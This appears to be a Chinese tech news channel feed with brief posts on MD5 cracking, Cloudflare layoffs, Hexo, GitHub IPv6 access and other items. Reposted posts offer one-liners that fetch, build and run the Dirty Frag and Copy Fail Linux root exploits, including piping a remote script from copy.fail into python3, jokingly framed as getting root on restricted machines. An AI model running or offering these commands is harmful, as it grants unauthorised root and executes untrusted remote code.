OKHK 👀

个人数字泔水\(⁠◔⁠‿⁠◔⁠)
✨ Thinking...

1 小时前

打开 OpenAI 的月度账单是什么感觉
2 小时前

六成 MD5 密码能在一小时内破解
#加密技术

卡巴斯基研究人员发现，如果你有一块英伟达 RTX 5090 显卡，那么六成 MD5 哈希密码可在一小时内破解，48% 的密码甚至能在一分钟内破解。如果泄露的密码使用的是 MD5 之类的哈希算法，那么密码基本可以认为被暴露了。研究人员分析了逾 2 亿个泄露的密码，发现攻击者可利用常见模式优化破解算法，显著缩短猜测密码字符组合的时间。研究人员称破解速度加快主要归功于 GPU，GPU 的性能一直在进步，但密码的安全性则没什么变化。
https://www.theregister.com/security/2026/05/07/60-of-md5-password-hashes-are-crackable-in-under-an-hour/5234954

加密技术
2 小时前

在 V2 也能看到经典 localhost 地址啊 🤣

做了个韩国半导体股票数据 API，免费看盘 + 付费接口

之前做量化的时候发现中文圈几乎没有能拿到韩国股票实时数据的渠道，Yahoo Finance 倒是有但连个像样的封装都没有。

于是就自己撸了一个：

- 拉的是 Yahoo Finance 数据源，覆盖三星电子、SK 海力士、DB HiTek 、Wonik IPS 、三星 SDI 、SK Square 、LG Display 这几支芯片股 + KOSPI 指数
- 免费仪表盘可以直接手机打开看，苹果暗色风格，红涨绿跌
- 如果想拉到自己的程序里用，有 REST API 返回 JSON ，¥29/ 月

仪表盘地址： http://192.168.0.3:8888
（打个样先跑着，后续加外网映射和更多指标）

还在早期，有啥想要的功能或者数据可以提，我看看能不能加上。

https://www.v2ex.com/t/1211025
Expand hidden content

V2EX

做了个韩国半导体股票数据 API，免费看盘 + 付费接口 - V2EX

分享创造 - @ttszuo - 之前做量化的时候发现中文圈几乎没有能拿到韩国股票实时数据的渠道，Yahoo Finance 倒是有但连个像样的封装都没有。于是就自己撸了一个：- 拉的是 Yahoo Finance 数
4 小时前

Hexo 维护者误将 Hexo repo 设置为 private；现已恢复。

Watcher 和 Stargazer 均已丢失；订户如果想的话可以重新 watch/star。

gh:hexojs#5775

[感谢宝硕提供此消息。]

#Hexo
GitHub

Apology for Repository Visibility · hexojs · Discussion #5775

Hi everyone, I want to sincerely apologize for the accidental changes of visibility to our the most important repository earlier today. Which means we lost all stars and watchers. While using the G...

Hexo
4 小时前

这太尴尬了。
附件 A - 2025 年 9 月 - “助力构建未来” - Cloudflare 招聘 1111 名实习生“助力构建未来” [ https://blog.cloudflare.com/cloudflare-1111-intern-program/ ]

附件 B - 2026 年 5 月 - “面向未来” - Cloudflare 裁员 1100 人，约占其员工总数的 20%，以“继续构建未来” [ https://blog.cloudflare.com/building-for-the-future/ ]

最后，我想引用尤吉·贝拉的一句话：“未来已非昔日模样。”

https://news.ycombinator.com/item?id=48054423
The Cloudflare Blog

Help Build the Future: Announcing Cloudflare’s Goal to Hire 1,111 Interns in 2026

We are incredibly excited to announce our most ambitious intern program yet: Cloudflare aims to hire as many as 1,111 interns over the course of 2026.
4 小时前
OKHK 👀

#Linux root 密码重置大法 🤣（信创机器不给 root 密码的有救了 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && chmod +x ./exp && ./exp passwd root

还有之前的 Copy Fail 对应的重置 root 密码
```
curl https://copy.fail/exp | python3 && su
passwd root
```
#Linux
Linux
4 小时前
咕 Billchan 咕 🐱 抹茶芭菲批发中心

Dirty Frag: Universal Linux LPE 和 Copy Fail 类似，绝大多数发行版可一键提权禁用 esp4、esp6、rxrpc 可以缓解 sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true" h…

#Linux root 密码重置大法 🤣（~~信创机器不给 root 密码的有救了~~
```
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && chmod +x ./exp && ./exp
passwd root
```
Linux
5 小时前

OKHK 👀

Claude 历次事故记录（翻车历史） https://clawd.rip #AI

GitHub 故障宕机贡献图，红色越深，贡献越大
https://red-squares.cian.lol/
5 小时前

OKHK 👀

Cutia，AI 加持的 Web 版视频编辑器，CapCut 替代 #Video #Tool #AI #GitHub https://cutia.msgbyte.com/ https://github.com/msgbyte/cutia

浏览器中的 Web 视频剪辑工具，本地处理无需上传云端，CapCut 的开源替代
https://github.com/Augani/openreel-video
#Video #Tool #GitHub
GitHub

GitHub - Augani/openreel-video: OpenReel Video - Professional browser-based video editor. Open source CapCut alternative. 100%…

OpenReel Video - Professional browser-based video editor. Open source CapCut alternative. 100% browser-based, no installation, no cloud uploads, no watermarks. - Augani/openreel-video

Video Tool GitHub
6 小时前

浏阳烟花车间爆炸事故已致37死51伤（其中重症5人，生命体征平稳），另有1人失联。现场搜救工作已基本结束。
（新华社）

GitHub IPv6 访问
https://www.nodeseek.com/post-531425-1

2a01:4f8:c010:d56::2 github.com
2a01:4f8:c010:d56::3 api.github.com
2a01:4f8:c010:d56::4 codeload.github.com
2a01:4f8:c010:d56::6 ghcr.io
2a01:4f8:c010:d56::7 pkg.github.com npm.pkg.github.com maven.pkg.github.com nuget.pkg.github.com rubygems.pkg.github.com
2a01:4f8:c010:d56::8 uploads.github.com
2606:50c0:8000::133 objects.githubusercontent.com www.objects.githubusercontent.com release-assets.githubusercontent.com gist.githubusercontent.com repository-images.githubusercontent.com camo.githubusercontent.com private-user-images.githubusercontent.com avatars0.githubusercontent.com avatars1.githubusercontent.com avatars2.githubusercontent.com avatars3.githubusercontent.com cloud.githubusercontent.com desktop.githubusercontent.com support.github.com
2606:50c0:8000::154 support-assets.githubassets.com github.githubassets.com opengraph.githubassets.com github-registry-files.githubusercontent.com github-cloud.githubusercontent.com

NodeSeek

让纯IPV6小鸡也能使用GITHUB

2052年了，github还是不支持ipv6访问。由于komari-agent安装需要访问github，查找方法的时候，偶然发现了一篇文章：https://danwin1210.de/github-ipv6-proxy.php，其中总结有github已提供ipv6访问、但未加入DNS解析的站点地址。具体食用方法如下

11 小时前

#YearProgress

▓▓▓▓▓▓▓░░░░░░░░░░░░░ 35%

YearProgress
11 小时前

一觉醒来发生了什么 05 月 08 日
#Daily

2026 年 5 月 8 日
🌍 资讯快读
1、中国红十字系统 2025 年调拨救灾款物超 4 亿元
https://www.jiemian.com/article/14394080.html
2、TikTok 获批泰国 250 亿美元数据中心扩建计划
https://www.jiemian.com/article/14391708.html
3、八部门发文改革完善儿童用药供应保障，破解儿童用药难
https://www.jiemian.com/article/14394329.html
4、30 年前捐赠书画部分去向不明？天津美院回应
https://www.jiemian.com/article/14393173.html

👬 即刻镇小报
1、字最少，文案劲最大
https://m.okjike.com/originalPosts/69f57a42c2dc8bf83fd35ac5
2、看完刷手机的欲望彻底消失了
https://m.okjike.com/originalPosts/69f74dc0b955e4c0a2b93860
3、Vibe Coding 是一种无限游戏
https://m.okjike.com/originalPosts/69f43556af7695b4cf9fac0b
4、南极洛，想要再去一万次的地方
https://m.okjike.com/originalPosts/69f722a6af7695b4cfe527a3

今日即刻镇小报内容来自 @Zephyr. @唐夕 _JwPF @Szhans @泡泡啊泡泡，感谢以上即友的创作与分享。
界面新闻

中国红十字系统2025年调拨救灾款物超4亿元

据中国红十字会，2025年全国红十字系统高效处置地震洪涝等各类灾害，累计启动应急响应228次，紧急救援、转移安置和灾后重建投入款物超4亿元。同时健全防灾减灾协作机制，年度应急救护培训超621万人次，累计配置AED8.6万余台，在北京、深圳等8个城市试点开展“车载AED志愿服务”项目，营运车辆变身为“流动的应急响应单元”。（央视新闻）

Daily
15 小时前
Dirty Frag: Universal Linux LPE
和 Copy Fail 类似，绝大多数发行版可一键提权

禁用 esp4、esp6、rxrpc 可以缓解
```
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"
```
https://dirtyfrag.io/
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/
exp: https://github.com/V4bel/dirtyfrag/blob/master/exp.c
18 小时前

https://roriri.one/2026/05/06/better-scroll-bar
螺莉莉的数据中心

一根上流滚动条的诞生 | 螺莉莉的数据中心

花了两天，做了一个有点复杂的小玩意：本站右侧的那根滚动条，觉得这是一个很上流的玩意，于是把它生出这玩意的四十八小时脑子里面都在想什么全都呕吐出来 c⌒っ.ω.)っ。
世人苦滚动条久矣，有一个看似统一的标准，但是 Blink 先森和它的前妻又有一套爆炸复杂的 CSS 规则，它复杂到我几乎没有动自己手写规则的念头，清一色都在用在线生成器做一个凑合。
你想要让所有平台都有稳定的用户体验，这事情几乎是不可能的，移动端有移动端的脾气，各个浏览器引擎有自己的审美。而且也有一些很现实的事情，滚动条作为一个 Native…
1 天前

Hands-on Modern RL - 现代强化学习实战指南
https://walkinglabs.github.io/hands-on-modern-rl
https://fxtwitter.com/sanbuphy/status/2052191088048558243
FxTwitter

Sanbu 散步 (@sanbuphy)

花了段时间写了 RL 教程 Hands-On Modern RL，路线是从 CartPole + PPO 入门，然后到 LLM 后训练（RLHF、DPO、GRPO）、Agentic RL。代码先行，公式用来解释现象。英文版很快更新。
目前是草稿版本，RLHF、Agentic RL 部分本地审校中。
欢迎提 PR 或 Issue & 显卡支持：https://github.com/walkinglabs/hands-on-modern-rl
1 天前

未来的 reCAPTCHA 验证将需要手机
#移动

如何遏制智能体给网站带来的欺骗性自动流量？Google 的下一代 reCAPTCHA 验证技术将通过二维码要求人类使用手机进行扫描操作来区分机器和人类。Google 对手机的要求是：运行 iOS v15.0-16.4 的苹果设备，需要下载专门的 reCAPTCHA app；Android 设备运行的 Google Play Services 版本必须高于 25.41.30，该版本是在 2025 年 10 月释出的。以后你可能需要比较新的手机设备才能正常浏览网站。
https://support.google.com/recaptcha/answer/16609652
https://cloud.google.com/blog/products/identity-security/introducing-google-cloud-fraud-defense-the-next-evolution-of-recaptcha/

移动
1 天前

超 600 种语言，一个模型全搞定! 小米开源 OmniVoice 多语言语音克隆 TTS #TTS
Telegraph

超600种语言，一个模型全搞定! 小米开源 OmniVoice 多语言语音克隆 TTS

数秒克隆语音早已不是新鲜事，但能覆盖600+语种的语音克隆 TTS 模型，你见过吗！主流音色克隆 TTS 模型的多语言支持最多停留在几十种，大量低资源小语种始终难以覆盖，成为行业痛点。小米AI实验室新一代Kaldi团队全新推出 OmniVoice，以创新的极简架构打破这一局限，不仅在中英文场景达到顶尖性能，更在多语言任务中展现出超越商用系统的实力，是业内首个覆盖数百语种的语音克隆 TTS 模型，在低资源小语种上具备极强的泛化能力，你想得到的所有语种几乎都可以用 OmniVoice 来合成。

TTS
1 天前

公安部网安局5月7日通报：邢某用AI生成中国国民党主席郑丽文的数字人形象和带货文案，进行直播带货。山西大同警方以《治安管理处罚法》“招摇撞骗”一条将她行政拘留。
（公安部网安局）